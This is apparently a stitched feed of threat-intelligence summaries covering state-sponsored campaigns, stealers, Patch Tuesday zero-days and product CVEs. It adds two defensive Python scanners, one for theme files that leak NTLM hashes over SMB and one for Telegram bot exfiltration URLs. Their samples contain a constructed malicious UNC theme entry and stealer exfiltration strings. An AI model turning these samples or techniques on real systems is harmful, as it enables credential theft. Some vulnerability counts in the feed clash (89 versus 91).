Summary:

In a recent cyber campaign, the Chinese state-sponsored threat group TAG-112 compromised two Tibetan websites to deliver Cobalt Strike. The attackers embedded malicious JavaScript that displayed a spoofed TLS certificate error, tricking visitors into downloading a fake "security certificate" that delivered the Cobalt Strike payload. The incident fits a pattern of cyber-espionage against Tibetan entities, and TAG-112's infrastructure overlaps with that of other Chinese state-sponsored operations.…

Summary: Microsoft's November 2024 Patch Tuesday addresses 91 vulnerabilities, including four zero-days, two of which are actively exploited. The fixes cover remote code execution, elevation of privilege and other flaw classes.

Threat Actor: Unknown | unknown Victim: Microsoft | Microsoft

Key Point :

Four zero-day vulnerabilities were disclosed, two of which were actively exploited in attacks.…

Threat Actor: Unknown | Unknown Victim: Microsoft | Microsoft Price: N/A Exfiltrated Data Type: NTLMv2 hash, Remote Code Execution capabilities

Key Points :

Microsoft Patch Tuesday for November 2024 fixed 89 vulnerabilities across various products. Two zero-day vulnerabilities, CVE-2024-43451 and CVE-2024-49039, were actively exploited at the time of release.…

Summary: A new Rust-based malware named Fickle Stealer has emerged, targeting sensitive information from compromised systems through deceptive tactics and multiple attack vectors. It employs advanced evasion techniques, masquerading as legitimate applications to avoid detection while siphoning data to attackers.

Threat Actor: Unknown | Fickle Stealer Victim: Individuals and organizations | Fickle Stealer victims

Key Point :

Fickle Stealer spreads through phishing, drive-by downloads, exploit kits, and social engineering.…

Summary: SentinelLabs has identified a new campaign dubbed 'Hidden Risk' by a suspected North Korean threat actor targeting cryptocurrency businesses with sophisticated multi-stage malware. This campaign employs phishing tactics and a novel persistence mechanism that abuses the Zsh configuration file (zshenv), which is sourced by every Zsh session, to maintain access to compromised systems.

Threat Actor: DPRK | BlueNoroff Victim: Cryptocurrency Businesses | cryptocurrency businesses

Key Point :

The ‘Hidden Risk’ campaign utilizes phishing emails with fake cryptocurrency news to deliver malware disguised as PDF files.…

Summary:

Fickle Stealer is a newly identified Rust-based information stealer that spreads through various attack vectors such as phishing and exploit kits. It effectively bypasses security measures like User Account Control (UAC) and is capable of stealing sensitive information, including passwords and cryptocurrency wallet details. The malware employs advanced obfuscation techniques to evade detection, making it a significant threat to compromised systems.…

Summary: A Windows Themes zero-day vulnerability lets an attacker obtain a user's NTLM credentials remotely, prompting ACROS Security to release free unofficial (0patch) micropatches. The flaw lies in how Windows handles theme files: a theme that references a resource on an attacker-controlled host makes Windows authenticate to that host over SMB, leaking the user's NTLM hash as soon as the file is viewed in Windows Explorer, without the user opening it.

Threat Actor: Unknown | unknown Victim: Windows Users | Windows Users

Key Point :

The vulnerability leaks the user's NTLM credentials when a malicious theme file is merely viewed in Windows Explorer.…
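The theme-file vector described above, as an added example that is not part of the original article or of 0patch's work: Windows .theme files are INI-style text, so a small Python scanner can parse one and flag any value that points at a remote host, either a UNC path (\\host\share\...) or a file:// URL, because resolving such a path from Explorer opens an SMB session and the NTLM authentication that follows leaks the user's hash. The sample theme text and the host 203.0.113.10 are constructed for the demo; the exact keys the zero-day abuses are not stated on the page, so the scanner checks every key in every section.

```python
import configparser
import re
from typing import List, Tuple

# A value that names a remote host: a UNC path (\\host\share\...) or a file://
# URL with a host part. Local prefixes such as \\?\C:\... and \\.\device are
# deliberately excluded (host part may not start with '?' or '.').
REMOTE_REF = re.compile(
    r"^\s*(?:\\\\[^\\\s?.][^\\\s]*\\\S*|file://[^/\s]+/\S*)", re.IGNORECASE
)


def find_remote_refs(theme_text: str) -> List[Tuple[str, str, str]]:
    """Return (section, key, value) for every entry whose value points off-host."""
    parser = configparser.ConfigParser(interpolation=None, strict=False)
    parser.optionxform = str  # keep key names exactly as written in the file
    parser.read_string(theme_text)
    hits = []
    for section in parser.sections():
        for key, value in parser.items(section):
            if REMOTE_REF.match(value):
                hits.append((section, key, value))
    return hits


def scan_theme_file(path: str) -> List[Tuple[str, str, str]]:
    """Scan a .theme file on disk; theme files are commonly UTF-16 with a BOM or ANSI."""
    with open(path, "rb") as fh:
        raw = fh.read()
    if raw[:2] in (b"\xff\xfe", b"\xfe\xff"):
        text = raw.decode("utf-16")
    else:
        try:
            text = raw.decode("utf-8-sig")
        except UnicodeDecodeError:
            text = raw.decode("cp1252")
    return find_remote_refs(text)


# Constructed sample theme, not a real malicious file. Only BrandImage points
# off-host; the other paths are ordinary local references.
SAMPLE_THEME = r"""
; Windows Theme File (constructed sample)
[Theme]
DisplayName=Quarterly Report
BrandImage=\\203.0.113.10\share\brand.png

[Control Panel\Desktop]
Wallpaper=%SystemRoot%\web\wallpaper\Windows\img0.jpg
TileWallpaper=0

[VisualStyles]
Path=%SystemRoot%\resources\Themes\Aero\Aero.msstyles
ColorStyle=NormalColor
"""

if __name__ == "__main__":
    for section, key, value in find_remote_refs(SAMPLE_THEME):
        print(f"[{section}] {key} -> remote reference: {value}")
```

Run it over a quarantined download folder (`scan_theme_file` on each *.theme) before anyone browses that folder in Explorer; a hit means the file will coerce an outbound SMB authentication whether or not it is ever opened.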

Summary: A critical vulnerability in the BattlEye anti-cheat system, reported by researcher timoxa565, lets attackers tamper with the client-server authentication process, potentially causing illegitimate account bans across several online games. The exploit, dubbed "BannleEye," manipulates the communication between the client and server libraries so that a malicious actor can spoof a legitimate game environment.…

Threat Actor: Cybercriminals | cybercriminals Victim: Individuals and Organizations | individuals and organizations Price: Potential loss of $50,000+ Exfiltrated Data Type: Personal and financial information

Key Points :

Phishing emails are common attack methods used by cybercriminals to deceive recipients. Attackers often impersonate trusted organizations to manipulate victims into sharing sensitive information.…

Short Summary:

The article discusses the analysis of a packed Snake Keylogger malware sample. It details the reverse engineering process, including unpacking techniques, the use of .NET obfuscation, and the malware’s capabilities such as keylogging and clipboard hijacking. The analysis also highlights the malware’s communication with the threat actor’s Telegram bot and the extraction of various indicators of compromise (IOCs).…
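IOC extraction for the Telegram exfiltration channel mentioned above, as an added example rather than code from the article: Snake Keylogger is a .NET stealer, and .NET user strings are stored as UTF-16LE, so a plain ASCII `strings` pass misses them. The function below searches a raw byte blob (a dumped process region or the unpacked assembly) both as 8-bit text and as UTF-16LE at both byte alignments for Telegram Bot API URLs and pulls out the bot id, token, method and chat_id. The blob and the token in it are constructed for the demo and are not real indicators.

```python
import re
from typing import Dict, List

# Telegram Bot API call as it appears in stealer configs/strings:
#   https://api.telegram.org/bot<token>/<method>[?chat_id=<id>...]
# A bot token is "<numeric bot id>:<secret>"; the secret is a long
# base64url-style string, so require at least 30 such characters.
TELEGRAM_RE = re.compile(
    r"https?://api\.telegram\.org/bot(?P<token>\d{5,}:[A-Za-z0-9_-]{30,})"
    r"/(?P<method>[A-Za-z]+)(?:\?chat_id=(?P<chat_id>-?\d+))?"
)


def _text_views(blob: bytes) -> List[str]:
    """The same bytes seen as 8-bit text and as UTF-16LE at both alignments."""
    return [
        blob.decode("latin-1"),
        blob.decode("utf-16le", errors="ignore"),
        blob[1:].decode("utf-16le", errors="ignore"),
    ]


def extract_telegram_iocs(blob: bytes) -> List[Dict[str, str]]:
    """Unique Telegram bot endpoints found in the blob, in first-seen order."""
    seen = set()
    iocs: List[Dict[str, str]] = []
    for text in _text_views(blob):
        for m in TELEGRAM_RE.finditer(text):
            key = (m["token"], m["method"], m["chat_id"] or "")
            if key in seen:
                continue
            seen.add(key)
            iocs.append({
                "bot_id": m["token"].split(":", 1)[0],
                "token": m["token"],
                "method": m["method"],
                "chat_id": m["chat_id"] or "",   # empty when passed in the POST body
            })
    return iocs


def redact(token: str) -> str:
    """Keep the numeric bot id, mask the secret: safe to paste into a report."""
    bot_id, secret = token.split(":", 1)
    return f"{bot_id}:{secret[:4]}{'*' * (len(secret) - 4)}"


# Constructed strings dump: one ASCII URL and one UTF-16LE URL (as a .NET
# #US-heap string would appear), with filler bytes around them. Not a real token.
SAMPLE_TOKEN = "1234567890:AAEconstructedTokenXXXXXXXXXXXXXXXX"
SAMPLE_BLOB = (
    b"\x00\x01junk"
    + f"https://api.telegram.org/bot{SAMPLE_TOKEN}/sendMessage?chat_id=-1001234567890".encode()
    + b"\x00\x00"
    + f"https://api.telegram.org/bot{SAMPLE_TOKEN}/sendDocument".encode("utf-16le")
    + b"\x00\x00"
)

if __name__ == "__main__":
    for ioc in extract_telegram_iocs(SAMPLE_BLOB):
        print(f"bot {ioc['bot_id']} token={redact(ioc['token'])} "
              f"method={ioc['method']} chat_id={ioc['chat_id'] or '-'}")
```

The bot id and chat_id are the stable indicators to share; the full token is a live credential for the attacker's bot and should be reported to Telegram or kept out of public IOC lists, hence `redact`.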

Summary: A serious vulnerability in Zendesk’s email management system, identified as CVE-2024-49193, exposes companies to email spoofing attacks that can compromise sensitive support ticket histories. Despite initial dismissals from Zendesk, the flaw has prompted urgent action from affected companies to mitigate risks.

Threat Actor: Unknown | unknown Victim: Zendesk Users | Zendesk

Key Point :

The vulnerability allows attackers to spoof emails and gain unauthorized access to sensitive ticket histories.…

Summary: Microsoft has released patches for two actively exploited zero-day vulnerabilities and three additional publicly disclosed vulnerabilities in its latest Patch Tuesday update. The vulnerabilities pose significant risks to organizations, particularly those using Windows-based systems for administrative tasks.

Threat Actor: Various | threat actor Victim: Organizations using Windows systems | organizations using Windows systems

Key Point :

CVE-2024-43572, a remote code execution vulnerability in Microsoft Management Console (MMC) with a CVSS score of 7.8, poses a considerable risk to millions of endpoints.…

Short Summary:

This article investigates a cybercriminal’s exposed server that contained various malicious tools, including DDoS scripts, SpyNote spyware disguised as popular apps, phishing pages targeting cryptocurrency companies, and ransom notes suggesting ransomware delivery. The findings provide insights into the tactics and strategies employed by cybercriminals to exploit unsuspecting networks.…

Summary: Security researcher Peter Gabaldon disclosed critical vulnerabilities in TeamViewer, enabling local privilege escalation attacks on Windows systems. The flaws, CVE-2024-7479 and CVE-2024-7481, arise from improper cryptographic signature verification during driver installations, potentially allowing attackers to gain SYSTEM-level access.

Threat Actor: Unknown | unknown Victim: TeamViewer users | TeamViewer

Key Point :

Two vulnerabilities (CVE-2024-7479 and CVE-2024-7481) allow attackers to escalate privileges from USER to KERNEL by exploiting improper signature verification during driver installation.…

Summary: Cybersecurity researchers are alerting organizations about active exploitation attempts of a newly disclosed vulnerability, CVE-2024-45519, in Synacor’s Zimbra Collaboration software. The flaw allows unauthenticated attackers to execute arbitrary commands, prompting urgent patching recommendations from security experts.

Threat Actor: Unknown | unknown Victim: Synacor | Synacor

Key Point :

Exploitation attempts began shortly after the vulnerability was disclosed, indicating a rapid response from threat actors.…

Short Summary:

This article discusses a vishing attack that targeted a remote employee in the hospitality sector, leading to unauthorized access to the customer’s network. Darktrace’s anomaly-based threat detection successfully identified and mitigated the attack, preventing data loss and reinforcing the importance of robust security measures against social engineering tactics.…